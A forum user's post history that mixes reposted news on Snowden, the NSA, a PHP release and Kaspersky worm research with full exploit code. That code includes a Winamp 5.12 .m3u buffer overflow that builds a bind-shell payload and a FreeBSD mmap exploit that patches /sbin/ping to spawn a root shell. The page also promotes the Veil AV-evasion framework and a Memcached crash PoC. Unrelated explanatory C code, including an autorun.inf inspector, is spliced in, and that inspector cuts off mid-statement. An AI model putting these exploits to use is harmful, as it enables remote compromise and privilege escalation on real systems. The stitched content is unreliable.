Everything posted by Nytro
-
HKSAR Government issues statement on Edward Snowden

The HKSAR Government today (June 23) issued the following statement on Mr Edward Snowden:

Mr Edward Snowden left Hong Kong today (June 23) on his own accord for a third country through a lawful and normal channel.

The US Government earlier on made a request to the HKSAR Government for the issue of a provisional warrant of arrest against Mr Snowden. Since the documents provided by the US Government did not fully comply with the legal requirements under Hong Kong law, the HKSAR Government has requested the US Government to provide additional information so that the Department of Justice could consider whether the US Government's request can meet the relevant legal conditions. As the HKSAR Government has yet to have sufficient information to process the request for provisional warrant of arrest, there is no legal basis to restrict Mr Snowden from leaving Hong Kong.

The HKSAR Government has already informed the US Government of Mr Snowden's departure.

Meanwhile, the HKSAR Government has formally written to the US Government requesting clarification on earlier reports about the hacking of computer systems in Hong Kong by US government agencies. The HKSAR Government will continue to follow up on the matter so as to protect the legal rights of the people of Hong Kong.

Ends/Sunday, June 23, 2013
Issued at HKT 16:05

Source: http://www.info.gov.hk/gia/general/201306/23/P201306230476.htm
-
Stupid topic => cobra89 - ban (3 days). Useless posts unrelated to the subject - warn.
-
[h=1]PHP 5.5.0 Release Announcement[/h]
The PHP development team is proud to announce the immediate availability of PHP 5.5.0. This release includes a large number of new features and bug fixes.

The key features of PHP 5.5.0 include:
- Added generators and coroutines.
- Added the finally keyword.
- Added a simplified password hashing API.
- Added support for constant array/string dereferencing.
- Added scalar class name resolution via ::class.
- Added support for using empty() on the result of function calls and other expressions.
- Added support for non-scalar Iterator keys in foreach.
- Added support for list() constructs in foreach statements.
- Added the Zend OPcache extension for opcode caching.
- The GD library has been upgraded to version 2.1 adding new functions and improving existing functionality.
- A lot more improvements and fixes.

Changes that affect compatibility:
- PHP logo GUIDs have been removed.
- Windows XP and 2003 support dropped.
- Case insensitivity is no longer locale specific. All case insensitive matching for function, class and constant names is now performed in a locale independent manner according to ASCII rules.

For users upgrading from PHP 5.4, a migration guide is available detailing the changes between 5.4 and 5.5.0. For a full list of changes in PHP 5.5.0, see the ChangeLog.

Source: PHP: PHP 5.5.0 Release Announcement
-
[h=1]Winamp 5.12 (.m3u) - Stack Based Buffer Overflow[/h]
# Exploit Title: Winamp 5.12 .m3u stack based buffer overflow
# Date: 16 June 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.winamp.com/
# Software Link: http://www.oldapps.com/winamp.php?old_winamp=211
# Version: 5.12
# Tested on: Windows XP Professional SP2, English
# CVE: CVE-2006-0720
# BID: 16785
#
# Description from CVE-2006-0720
# Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13
# allows user-assisted attackers to cause a denial of service
# (crash) and possibly execute arbitrary code via a crafted
# .m3u file that causes an incorrect strncpy function call
# when the player pauses or stops the file.
#
#
# 1. Launch Winamp
# 2. Drag boom.m3u into Winamp window
# 3. Check for bind shell on port 28876
#

import struct

header = "#EXTM3U\n"
header += "#EXTINF:1234,Pwnage Rock\n"

# NTDisplayString
egghunter = (
    "\x90" * 64 +
    "\x66\x81\xca\xff\x0f\x42\x52\x6a\x43\x58" +
    "\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" +
    "\x77\x30\x30\x74" +  # w00t
    "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" +
    "\x90" * 30
)

junk = "\x41" * 262 + "\x90" * 100 + egghunter

# bind shell on port 28876
# https://code.google.com/p/w32-bind-ngs-shellcode/
# msfencode -i w32-bind-ngs-shellcode.bin -b "\x00\x0a\x0d\x5c"
# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
shellcode = (
    "w00tw00t" +
    "\x90" * 239 +
    "\xbf\x26\x63\xb2\x20\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9" +
    "\xb1\x36\x83\xea\xfc\x31\x7a\x10\x03\x7a\x10\xc4\x96\x83" +
    "\xe9\x6c\xd2\x95\xd9\xe7\x92\x59\x91\x81\x46\xe9\xcb\x65" +
    "\xfc\x93\x33\xfe\x34\x54\x7b\x18\x4c\x57\xd2\x70\x9c\xc8" +
    "\xe6\xb2\x88\x90\x5e\xc5\x3b\x35\xe8\xa6\xb5\x5d\x9f\x5e" +
    "\x70\x5e\x89\x52\x52\xad\x40\x8d\x73\xde\xf9\x10\x2d\x60" +
    "\xaf\xc5\x9c\xe1\xa0\xc5\xba\xa9\xb5\x48\xff\xbe\x96\x6f" +
    "\x87\xc1\xcd\x04\x3c\xe2\x10\xf3\x95\xd3\xc0\x41\x91\x20" +
    "\x74\x44\x4b\xfc\x40\xea\xa7\x8c\x84\x36\xfb\x1f\xa0\x41" +
    "\x3e\xc7\x3f\x46\x61\x8c\x8b\xbc\x9f\x7b\x04\x0b\x8b\x2a" +
    "\x90\x38\xa8\xcd\x4f\x37\x38\xce\x8b\xd6\x12\x51\xad\xd1" +
    "\x11\x5a\x5f\xbf\xdd\x09\xa0\xef\x89\x38\xde\x31\x45\x36" +
    "\x6e\x13\x04\x47\x40\x06\xa9\x68\xf4\xd9\x79\x77\x08\x56" +
    "\xb6\xed\xe7\x3f\x14\xa4\xf8\x6f\xe3\x87\x73\x77\xdd\xd5" +
    "\x2e\xef\x7d\xb7\xaa\xcf\x0c\x3b\x17\x37\xa4\x6f\xfc\x81" +
    "\xfd\x86\x02\x59\x85\x65\x21\x36\xdb\xc7\x7b\x7e\x9c\x08" +
    "\x73\x29\x71\x85\xd3\x87\x8a\x7f\x38\xac\x33\x7c\x29\x78" +
    "\x44\x83\x55"
)

# 022B368C , call ecx , C:\Program Files\Winamp\pxsdkpls.dll
ret = struct.pack("<I", 0x022B368C)

# for some reason eip doesn't get overwritten and Winamp
# crashes differently unless the 4th byte after ret is
# a 0xB0. there's probably an easier way to do this but
# this is what the fuzzer found first so...
wtf = "\x43\x43\x43\xB0"

f = open("boom.m3u", "w")
f.write(header + junk + shellcode + ret + wtf)
f.close()

print "Created boom.m3u"
print "1. Open Winamp"
print "2. Drag boom.m3u into Winamp window"
print "3. Check for bind shell on port 28876"

Source: Winamp 5.12 (.m3u) - Stack Based Buffer Overflow
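The CVE description quoted in the Winamp post above attributes the crash to an incorrect strncpy call while the player handles a playlist entry. As an added example (not the post's or Winamp's code), here is the mis-bounded copy pattern next to a hardened playlist reader that bounds the copy by the destination and rejects over-long entries; the 260-byte buffer, the function names and the sample playlist are assumptions.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumed on-stack destination size (MAX_PATH-style); not taken from Winamp. */
#define M3U_PATH_MAX 260

/* Hypothetical mis-bounded copy, the bug class CVE-2006-0720 describes: the
 * length handed to strncpy comes from the untrusted source line, so the size of
 * the destination plays no part and an over-long entry runs past the buffer.
 * Kept only for contrast; it is called below with input known to fit. */
static void copy_path_unchecked(char *dst, const char *line)
{
    size_t n = strcspn(line, "\r\n");
    strncpy(dst, line, n);   /* bound derived from the source, not from dst */
    dst[n] = '\0';           /* may itself land past the end of dst */
}

/* Hardened copy: the bound is the destination size, over-long entries are
 * rejected rather than silently truncated into a different path, and the
 * result is always NUL-terminated. Returns true when the entry was stored. */
static bool copy_path_checked(char *dst, size_t dst_len, const char *line)
{
    size_t n = strcspn(line, "\r\n");
    if (dst_len == 0) return false;
    if (n >= dst_len) {      /* no room for the entry plus its terminator */
        dst[0] = '\0';
        return false;
    }
    memcpy(dst, line, n);
    dst[n] = '\0';
    return true;
}

/* Walk a playlist text line by line: '#' lines are directives (#EXTM3U,
 * #EXTINF), every other non-empty line is a path entry. Returns the number
 * of accepted entries; *rejected receives the count of over-long ones. */
static int scan_playlist(const char *text, int *rejected)
{
    char path[M3U_PATH_MAX];
    int accepted = 0;
    const char *p;
    *rejected = 0;
    for (p = text; *p; ) {
        size_t len = strcspn(p, "\n");
        if (len > 0 && p[0] != '#') {
            if (copy_path_checked(path, sizeof path, p)) accepted++;
            else (*rejected)++;
        }
        p += len + (p[len] == '\n');
    }
    return accepted;
}

/* Constructed sample playlist: one normal entry followed by a 400-byte entry
 * of the over-long kind a crafted .m3u carries (plain 'A' bytes, nothing else). */
static const char *sample_playlist(void)
{
    static char buf[1024];
    int n = snprintf(buf, sizeof buf,
                     "#EXTM3U\n#EXTINF:1234,Demo Track\nC:\\Music\\demo.mp3\n"
                     "#EXTINF:1234,Crafted Entry\n");
    memset(buf + n, 'A', 400);
    buf[n + 400] = '\n';
    buf[n + 401] = '\0';
    return buf;
}

int sample_accepted(void) { int r; return scan_playlist(sample_playlist(), &r); }
int sample_rejected(void) { int r; scan_playlist(sample_playlist(), &r); return r; }

/* The unchecked copy is exercised only on a short entry that fits. */
bool unchecked_copy_handles_short_entry(void)
{
    char dst[M3U_PATH_MAX];
    copy_path_unchecked(dst, "C:\\Music\\demo.mp3\n");
    return strcmp(dst, "C:\\Music\\demo.mp3") == 0;
}

int main(void)
{
    printf("accepted=%d rejected=%d\n", sample_accepted(), sample_rejected());
    return 0;
}
```
-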
[h=1]Memcached Remote Denial of Service PoC[/h]
A long time ago, in 2011, a rather serious vulnerability was reported in Memcached. It is now 2013, and the vulnerability still exists in the latest version on the memcached Google Code page.

The report is here: https://code.google.com/p/memcached/issues/detail?id=192

Now, as you can see, by sending a specially crafted packet, we can cause Memcached to segfault, and essentially die. Memcached is used by a lot of high profile sites to speed up page load times, and killing it would impact a bit on site performance, so I was rather curious as to why this bug had not yet been killed.

As you can see from the report, the vulnerability is trivial to exploit. Just send the magic packet of death and it kills the memcached service. I tried to get remote code execution from it, but had no luck at all. Perhaps one of you might have more luck!

memcached ded

Exploit code available to download here: killthebox.py

As always, responsible use is encouraged. Killing $(big website) memcached might get you in trouble, so don’t do it.

As for the memcached devs: You have known about this for two bloody years and never fixed it. This is terribly irresponsible of you. Fix it.

Source: Memcached Remote Denial of Service PoC | Insecurety Research
-
[h=2]FreeBSD mmap Privilege Escalation Exploit[/h]
/**
 * FreeBSD privilege escalation CVE-2013-2171 (credits Konstantin Belousov & Alan Cox)
 *
 * tested on FreeBSD 9.1
 * ref: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc
 *
 * @_hugsy_
 *
 * Syntax :
 * $ id
 * uid=1001(user) gid=1001(user) groups=1001(user)
 * $ gcc -Wall ./mmap.c && ./a.out
 * [+] Saved old '/sbin/ping'
 * [+] Using mmap-ed area at 0x281a4000
 * [+] Attached to 3404
 * [+] Copied 4917 bytes of payload to '/sbin/ping'
 * [+] Triggering payload
 * # id
 * uid=0(root) gid=0(wheel) egid=1001(user) groups=1001(user),0(wheel)
 *
 * Note : TARGET (default /sbin/ping) will lose its SUID bit on restore, must be restored by hand
 *
 */

#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>

#define LEN 1000*getpagesize()
#define TARGET "/sbin/ping" // will lose its SUID bit on restore, must be restored by hand

void kaboom(int pid, caddr_t addr)
{
    int nb, i, a, fd, n;
    char buf[60000] = {0,};

    a = i = 0;
    fd = open(TARGET, O_RDONLY);
    nb = read(fd, buf, 60000);
    close(fd);
    printf("[+] Saved old '%s'\n", TARGET);
    printf("[+] Using mmap-ed area at %p\n", addr);

    if (ptrace(PT_ATTACH, pid, 0, 0) < 0) {
        perror("[-] ptrace(PT_ATTACH) failed");
        return;
    }
    printf("[+] Attached to %d\n", pid);
    wait(NULL);

    fd = open("./sc.c", O_WRONLY|O_CREAT, S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH);
    write(fd, "#include <stdio.h>\nmain(){ char* s[]={\"/bin/sh\",NULL};setuid(0);execve(s[0],s,0); }\n", 84);
    close(fd);

    if (system("gcc -o ./sc ./sc.c") != 0) {
        perror("[-] gcc");
        return;
    }

    fd = open("./sc", O_RDONLY);
    while (1) {
        int a;
        int n = read(fd, &a, sizeof(int));
        if (n <= 0) break;
        if (ptrace(PT_WRITE_D, pid, addr+i, a) < 0) {
            perror("[-] ptrace(PT_WRITE_D) failed");
            return;
        }
        i+=n;
    }
    close(fd);
    printf("[+] Copied %d bytes of payload to '%s'\n", i, TARGET);

    printf("[+] Triggering payload\n");
    system(TARGET);

    printf("[+] Restoring '%s'\n", TARGET);
    for (n=0, i=0; n<nb; n++) {
        if (ptrace(PT_WRITE_D, pid, addr+n, *(buf+n)) < 0) {
            perror("[-] ptrace(PT_WRITE_D) failed");
            return;
        }
    }

    ptrace(PT_DETACH, pid, 0, 0);
    printf("[+] Done\n");
    return;
}

void dummy(int fd, caddr_t addr)
{
    sleep(1);
    munmap(addr, LEN);
    close(fd);
    return;
}

int main(int argc, char** argv, char** envp)
{
    int fd = open(TARGET, O_RDONLY);
    caddr_t addr = mmap(NULL, LEN, PROT_READ, MAP_SHARED, fd, 0);
    pid_t forked_pid = fork();

    switch(forked_pid) {
    case -1:
        return -1;
    case 0:
        dummy(fd, addr);
        break;
    default:
        munmap(addr, LEN);
        close(fd);
        kaboom(forked_pid, addr);
        wait(NULL);
        break;
    }

    return 0;
}

Source: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
-
They invented hacking.
-
We'll see over the weekend.
-
I hadn't seen that "Self".
-
How do you exploit it?
-
I didn't write it. There would be a lot to say. Have a little patience...
-
[h=3]Evidence that the NSA Is Storing Voice Content, Not Just Metadata[/h]
Interesting speculation that the NSA is storing everyone's phone calls, and not just metadata. Definitely worth reading.

I expressed skepticism about this just a month ago. My assumption had always been that everyone's compressed voice calls is just too much data to move around and store. Now, I don't know. There's a bit of a conspiracy-theory air to all of this speculation, but underestimating what the NSA will do is a mistake. General Alexander has told members of Congress that they can record the contents of phone calls. And they have the technical capability.

Earlier reports have indicated that the NSA has the ability to record nearly all domestic and international phone calls -- in case an analyst needed to access the recordings in the future. A Wired magazine article last year disclosed that the NSA has established "listening posts" that allow the agency to collect and sift through billions of phone calls through a massive new data center in Utah, "whether they originate within the country or overseas." That includes not just metadata, but also the contents of the communications.

William Binney, a former NSA technical director who helped to modernize the agency's worldwide eavesdropping network, told the Daily Caller this week that the NSA records the phone calls of 500,000 to 1 million people who are on its so-called target list, and perhaps even more.

"They look through these phone numbers and they target those and that's what they record," Binney said.

Brewster Kahle, a computer engineer who founded the Internet Archive, has vast experience storing large amounts of data. He created a spreadsheet this week estimating that the cost to store all domestic phone calls a year in cloud storage for data-mining purposes would be about $27 million per year, not counting the cost of extra security for a top-secret program and security clearances for the people involved.

I believe that, to the extent that the NSA is analyzing and storing conversations, they're doing speech-to-text as close to the source as possible and working with that. Even if you have to store the audio for conversations in foreign languages, or for snippets of conversations the conversion software is unsure of, it's a lot fewer bits to move around and deal with.

And, by the way, I hate the term "metadata." What's wrong with "traffic analysis," which is what we've always called that sort of thing?

Source: Schneier on Security: Evidence that the NSA Is Storing Voice Content, Not Just Metadata
-
[h=1]Veil – AV Evasion[/h]
[h=1]Veil v2.0 : Towards a True Framework[/h]
June 17, 2013 by The Grayhound

Repo Location: https://github.com/ChrisTruncer/Veil

Team Veil is proud to announce the release of Veil v2.0. This drastically reworked version of the Veil AV-evasion framework incorporates a new structure, a slew of new features, and a variety of new payloads:

New Structure

Veil has moved from a single flat file towards a truly modular framework:
- Payload modules dropped into ./modules/payloads/[language] are loaded into the framework automatically
- Common reusable functions are stored in various files in ./modules/common/*
- Source/compiled files are output by default to ./output/source/ and ./output/compiled/
- ./config/update.py is executed automatically on first run, producing a common configuration file at ./config/veil.py, which can be edited manually
- External tools used by payloads are stored in ./tools/
- ./doc/* contains pydoc generated documentation for the framework
- A tutorial describing how to develop payload modules is forthcoming.

New features
- Veil’s menus and interface have been redesigned for increased usability.
- One of the common requests for Veil was the inclusion of additional msfvenom shellcode payloads. To incorporate this, we built in automatic crawling of the metasploit /windows/* payload tree and the extraction of necessary payload parameters. The payloads should tab complete within the shellcode selection menu, in msfvenom windows/PAYLOAD format.
- Tab completion has also been added in a variety of places around the framework, including most menus, LHOST for IP completion, and LPORT for 4444 completion. Try it out!
- A new python ‘crypter’ named ‘pyherion’ (inspired by Null Security’s Hyperion) has been introduced, which encapsulates python payload files in an AES/base64 encoded wrapper that dynamically decodes/decrypts the python code in memory and executes it. A standalone version has also been introduced in ./tools/pyherion.py. A short post explaining its implementation details will be forthcoming.
- Command line switches have been implemented for almost all options. Type ./Veil.py -h for details.

New payloads
- C payloads – Using both a void pointer reference and direct injection into memory with VirtualAlloc calls
- Powershell – VirtualAlloc injection, MSF-psexec formatted resource file generation, and download/execution of a secondary payload.
- C# payloads – VirtualAlloc and base64 obfuscated payloads have been introduced, along with C# .exe compilation.
- Native payloads – hyperion and pescrambler

Source: https://www.veil-evasion.com/
-
[h=1]Internship at the Government for young students or graduates with basic IT knowledge. What criteria they must meet[/h]
Students or graduates of bachelor's degree programmes aged up to 25 with basic IT knowledge can apply until 1 July for a specialised practical training programme (internship) at the Prime Minister's Chancellery or the General Secretariat of the Government. The initiative is based on the governing programme, which provides for the creation of a real internship system in central and local public administration for students with outstanding results, the Executive reports.

An internship programme involves practical on-the-job training for professional careers, intended for students or university graduates, through which they can become familiar with the specifics of a structure and get to know its flow of activities while directly supporting employees in carrying out their daily tasks.

To be included in the programme, young people must cumulatively meet a series of eligibility criteria, namely: hold Romanian citizenship, be aged up to 25, be students or recent graduates of bachelor's degree programmes, have a good command of at least one foreign language of international circulation, and have basic IT knowledge (advanced knowledge for applications to the Online Services and Design Directorate). Candidates selected for the shortlist will be asked for additional supporting materials for their application.

The application form can be accessed from the website internship.gov.ro, and the deadline for submitting applications, by e-mail to the programme's official address internship@gov.ro, is 1 July 2013 inclusive. Applications received after that date will not be taken into consideration.

The selected young people will be assigned, according to their competences, to the Prime Minister's Chancellery or the General Secretariat of the Government.

Source: Internship at the Government for young students or graduates with basic IT knowledge. What criteria they must meet - Mediafax
-
How NSA access was built into Windows
Duncan Campbell 04.09.1999

Careless mistake reveals subversion of Windows by NSA.

A CARELESS mistake by Microsoft programmers has revealed that special access codes prepared by the US National Security Agency have been secretly built into Windows. The NSA access system is built into every version of the Windows operating system now in use, except early releases of Windows 95 (and its predecessors).

The discovery comes close on the heels of the revelations earlier this year that another US software giant, Lotus, had built an NSA "help information" trapdoor into its Notes system, and that security functions on other software systems had been deliberately crippled.

The first discovery of the new NSA access system was made two years ago by British researcher Dr Nicko van Someren. But it was only a few weeks ago when a second researcher rediscovered the access system. With it, he found the evidence linking it to NSA.

Computer security specialists have been aware for two years that unusual features are contained inside a standard Windows software "driver" used for security and encryption functions. The driver, called ADVAPI.DLL, enables and controls a range of security functions. If you use Windows, you will find it in the C:\Windows\system directory of your computer.

ADVAPI.DLL works closely with Microsoft Internet Explorer, but will only run cryptographic functions that the US government allows Microsoft to export. That information is bad enough news, from a European point of view. Now, it turns out that ADVAPI will run special programmes inserted and controlled by NSA. As yet, no-one knows what these programmes are, or what they do.

Dr Nicko van Someren reported at last year's Crypto 98 conference that he had disassembled the ADVAPI driver. He found it contained two different keys. One was used by Microsoft to control the cryptographic functions enabled in Windows, in compliance with US export regulations. But the reason for building in a second key, or who owned it, remained a mystery.

A second key

Two weeks ago, a US security company came up with conclusive evidence that the second key belongs to NSA. Like Dr van Someren, Andrew Fernandez, chief scientist with Cryptonym of Morrisville, North Carolina, had been probing the presence and significance of the two keys. Then he checked the latest Service Pack release for Windows NT4, Service Pack 5. He found that Microsoft's developers had failed to remove or "strip" the debugging symbols used to test this software before they released it. Inside the code were the labels for the two keys. One was called "KEY". The other was called "NSAKEY".

Fernandes reported his re-discovery of the two CAPI keys, and their secret meaning, to the "Advances in Cryptology, Crypto'99" conference held in Santa Barbara. According to those present at the conference, Windows developers attending the conference did not deny that the "NSA" key was built into their software. But they refused to talk about what the key did, or why it had been put there without users' knowledge.

A third key?!

But according to two witnesses attending the conference, even Microsoft's top crypto programmers were astonished to learn that the version of ADVAPI.DLL shipping with Windows 2000 contains not two, but three keys. Brian LaMachia, head of CAPI development at Microsoft, was "stunned" to learn of these discoveries, by outsiders. The latest discovery by Dr van Someren is based on advanced search methods which test and report on the "entropy" of programming code.

Within the Microsoft organisation, access to Windows source code is said to be highly compartmentalized, making it easy for modifications to be inserted without the knowledge of even the respective product managers.

Researchers are divided about whether the NSA key could be intended to let US government users of Windows run classified cryptosystems on their machines or whether it is intended to open up anyone's and everyone's Windows computer to intelligence gathering techniques deployed by NSA's burgeoning corps of "information warriors".

According to Fernandez of Cryptonym, the result of having the secret key inside your Windows operating system "is that it is tremendously easier for the NSA to load unauthorized security services on all copies of Microsoft Windows, and once these security services are loaded, they can effectively compromise your entire operating system". The NSA key is contained inside all versions of Windows from Windows 95 OSR2 onwards.

"For non-American IT managers relying on Windows NT to operate highly secure data centres, this find is worrying", he added. "The US government is currently making it as difficult as possible for "strong" crypto to be used outside of the US. That they have also installed a cryptographic back-door in the world's most abundant operating system should send a strong message to foreign IT managers".

"How is an IT manager to feel when they learn that in every copy of Windows sold, Microsoft has a 'back door' for NSA - making it orders of magnitude easier for the US government to access your computer?" he asked.

Can the loophole be turned round against the snoopers?

Dr van Someren feels that the primary purpose of the NSA key inside Windows may be for legitimate US government use. But he says that there cannot be a legitimate explanation for the third key in Windows 2000 CAPI. "It looks more fishy", he said.

Fernandez believes that NSA's built-in loophole can be turned round against the snoopers. The NSA key inside CAPI can be replaced by your own key, and used to sign cryptographic security modules from overseas or unauthorised third parties, unapproved by Microsoft or the NSA. This is exactly what the US government has been trying to prevent. A demonstration "how to do it" program that replaces the NSA key can be found on Cryptonym's website.

According to one leading US cryptographer, the IT world should be thankful that the subversion of Windows by NSA has come to light before the arrival of CPUs that handle encrypted instruction sets. These would make the type of discoveries made this month impossible. "Had the next-generation CPU's with encrypted instruction sets already been deployed, we would have never found out about NSAKEY."

Source: How NSA access was built into Windows | Telepolis
-
http://fbcdn-sphotos-g-a.cloudliv.net/hphotos-ak-ash4/5223013_371023452991370_522301357_n.jpgb
-
[h=1]AutoRun. Reloaded[/h]
Konstantin Markov
Kaspersky Lab Expert
Posted June 13, 11:17 GMT

Recent months have produced little of interest among worms written in Java and script languages such as JavaScript and VBScript. The main reason behind this was the limited proficiency of the virus writers, whose creations were anything but remarkable. However, a couple of malware samples grabbed our attention; their complexity is testimony to the fact that professionals sometimes get involved as well. Kaspersky Lab’s products detect these special worms as Worm.JS.AutoRun and Worm.Java.AutoRun. They are also detected by heuristic methods as HEUR:Worm.Script.Generic and HEUR:Worm.Java.Generic respectively.

These two worms have three key features in common: heavy obfuscation, backdoor-type essential payloads, and similar methods of propagation. Both worms spread by copying themselves and the configuration file autorun.inf into the root folders of logical volumes of removable storage media and network disks. If these infected storages are opened on other computers, the infection can spread. Having infected the operating system and established a foothold on the victim computer, the malicious programs deploy their principal payload.

For months, the number of AutoRun worms detected on Kaspersky Lab users’ computers remained essentially unchanged. According to Kaspersky Security Network data, half of all script worms spread themselves this way. As for Java worms, this is not their usual method of propagation. However, in the last three months we have seen a dramatic rise in the number of new Worm.Java.AutoRun modifications.

Figure: Detection levels for unique script worms, AutoRun script worms, and heuristically detected AutoRun script worms, April 2012 – May 2013

Figure: Detection levels for Java worms, AutoRun Java worms, and heuristically detected AutoRun Java worms, August 2011 – May 2013

Both worms are polymorphic: they modify their bodies during propagation, complicating their detection. This is one of the reasons why they have become more prominent compared with “regular” worms. Below is a narrative of what we have encountered.

[h=2]Worm.Java.AutoRun[/h]
There are not many Java-based resident malware programs for PC, and worms are especially rare. So we undertook a detailed analysis of this sample.

The worm deploys itself on an infected computer in the form of four files:
- Java archive: the core component; its name changes in each infection attempt. It is located in the users’ temporary folder %TEMP%\jar_cache*.tmp.
- Autorun.inf: a configuration file which ensures the worm is launched automatically when infected external storage media or a mounted network drive is opened.
- DLL file: an auxiliary (Win 32) DLL which is responsible for part of the propagation task. The name of this file also varies: it is defined at the time when the computer is infected. The DLL is copied to the user’s temporary folder: %TEMP%\hsperfdata_%USERNAME%\
- Java.exe is a legal executable file of the pre-installed JAVA package. The worm uses it to ensure it can always load itself into the memory of an infected computer. When an infection occurs, this executable file is copied from %ProgramFiles% to the user’s temporary folder (beside the above DLL) and is given a name associated with a system process, e.g. winlogon, csrss, or services. Then it is executed using the launch parameters of the Java archive, which is the core component.

Figure: Fragment of the class-file of a malicious JAVA archive

Once initialized, the malicious Java archive extracts a dll from itself, copies itself to the temporary user catalogue and also copies the executable file Java.exe from %ProgramFiles% to the same catalogue, giving it a “trusted” name and executing it with the launch parameters of the duplicated Java archive. Then the Java archive injects the above library into the process created to distribute the worm to any available network sections and removable media. The launched malware occasionally sends requests to a command center to receive instructions from the cybercriminal.

As well as these quirks, this worm also uses strong obfuscation. Here a packer is used in conjunction with Zelix KlassMaster obfuscation. Also, as mentioned above, the worm is polymorphic. This makes it more difficult for antivirus solutions to detect.

According to Kaspersky Security Network, the worm is most widely distributed in India and Malaysia. The overall picture is shown on the map below.

Figure: Geographical distribution of users protected against Worm.Java.AutoRun, January-May 2013

According to the same data, the worm was most frequently picked up by Kaspersky Lab products at the end of May. Most of these detections referred to its most recent modifications, those which provoked the sudden spike in detections. This worm is still actively distributing itself, so we are continuing to closely monitor its activities.

Figure: Number of users protected against Worm.Java.AutoRun, April-May 2013

[h=2]Worm.JS.AutoRun[/h]
The distribution model of this worm not only uses the above method with autorun.inf, but also FTP-servers, file share sites, shared folders and CD/DVDs burned on the infected computers. The worm multiplies itself in catalogues and adds its launch to auto launch. At this time it checks the environment where it was launched. If the worm is launched on a non-virtual machine, it starts to search for active monitoring and PC protection tools. If they are detected, the worm terminates their work.

The malware receives commands via a file downloaded from the command center. These instructions are mostly about collecting information from the infected system. In particular, cybercriminals want the worm to gather information about the system, the user and the installed software. Like Worm.Java.AutoRun, this sample is well-encrypted and can change its form in different infections.

Figure: Code fragment for Worm.JS.AutoRun

Like the Java worm, this malware is most widespread in Southeast Asia, though this variant is more active in Vietnam and Indonesia.

Figure: Geographical distribution of users protected from Worm.JS.AutoRun from the beginning of 2013 to the end of May, 2013

Figure: Number of users protected from Worm.JS.AutoRun in the beginning of 2013 till the end of May, 2013

In this diagram you can see the number of users protected with the signature method only. Far more users are protected with heuristic methods, as shown in the first diagram.

According to Kaspersky Security Network data, Windows XP is widely used in those countries with large numbers of malware detections. More recent Microsoft versions ask users to confirm autorun execution, which decreases the chances of getting infected. Starting from Windows 7, only CD/DVD carriers are allowed to run automatically. When using external storage devices (for instance, a USB flash drive), autorun is switched off.

In order to protect your computer from infection, we advise you to update critical OS units and antivirus databases installed on the computer. You will find the guidelines about how to set the autorun function and links to updates in the following Microsoft article: http://support.microsoft.com/kb/967715

Source: AutoRun. Reloaded - Securelist
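Both worms depend on an autorun.inf in the root of a removable or network volume, and the Java variant starts a java.exe copy renamed after a system process with the archive as its argument. The added C example below (my own, not Kaspersky's tooling) inspects an autorun.inf text for launch directives and flags those patterns; the name lists, the function names and the two sample files are constructed.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

struct autorun_report {
    int  launch_directives;    /* open=, shellexecute=, shell\<verb>\command= lines */
    bool script_or_java;       /* target is a script host, Java, a script/jar file, or uses -jar */
    bool system_process_name;  /* target carries a system-process name the post lists */
};

/* Constructed name lists; the system-process names are the ones the post mentions. */
static const char *const script_exts[]  = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".jar", ".bat", ".cmd", NULL};
static const char *const script_hosts[] = {"java", "javaw", "wscript", "cscript", NULL};
static const char *const system_names[] = {"winlogon", "csrss", "services", NULL};

static bool in_list(const char *s, const char *const *list)
{
    for (; *list; list++) if (strcmp(s, *list) == 0) return true;
    return false;
}

/* Copy one line into buf, lowercased, with surrounding whitespace (including \r) removed. */
static void normalize_line(const char *p, size_t len, char *buf, size_t buf_len)
{
    size_t i;
    while (len && isspace((unsigned char)p[0])) { p++; len--; }
    while (len && isspace((unsigned char)p[len - 1])) len--;
    for (i = 0; i < len && i + 1 < buf_len; i++) buf[i] = (char)tolower((unsigned char)p[i]);
    buf[i] = '\0';
}

/* Return the value of a launch directive, or NULL if the line is not one. */
static const char *launch_value(const char *line)
{
    const char *eq = strchr(line, '=');
    if (!eq) return NULL;
    if (strncmp(line, "open=", 5) == 0 || strncmp(line, "shellexecute=", 13) == 0) return eq + 1;
    if (strncmp(line, "shell\\", 6) == 0 && strstr(line, "\\command=") == eq - 8) return eq + 1;
    return NULL;
}

/* Program token of a launch value (first word, quotes stripped), split into base name and extension. */
static void split_target(const char *value, char *base, size_t base_len, char *ext, size_t ext_len)
{
    char tok[260], stop = ' ';
    size_t n = 0, blen;
    const char *start, *q, *dot;
    while (*value == ' ') value++;
    if (*value == '"') { stop = '"'; value++; }
    for (; *value && *value != stop && n + 1 < sizeof tok; value++) tok[n++] = *value;
    tok[n] = '\0';
    for (start = q = tok; *q; q++)
        if (*q == '\\' || *q == '/') start = q + 1;   /* drop the directory part */
    dot = strrchr(start, '.');
    blen = dot ? (size_t)(dot - start) : strlen(start);
    if (blen >= base_len) blen = base_len - 1;
    memcpy(base, start, blen);
    base[blen] = '\0';
    snprintf(ext, ext_len, "%s", dot ? dot : "");
}

/* Parse the [autorun] section of an autorun.inf text and fill the report. */
void inspect_autorun(const char *text, struct autorun_report *r)
{
    char line[512], base[128], ext[32];
    bool in_autorun = false;
    const char *p = text, *value;
    memset(r, 0, sizeof *r);
    while (*p) {
        size_t len = strcspn(p, "\n");
        normalize_line(p, len, line, sizeof line);
        p += len + (p[len] == '\n');
        if (line[0] == '[') {                        /* section header */
            in_autorun = strcmp(line, "[autorun]") == 0;
            continue;
        }
        value = in_autorun ? launch_value(line) : NULL;
        if (!value) continue;
        r->launch_directives++;
        split_target(value, base, sizeof base, ext, sizeof ext);
        if (in_list(ext, script_exts) || in_list(base, script_hosts) || strstr(value, "-jar"))
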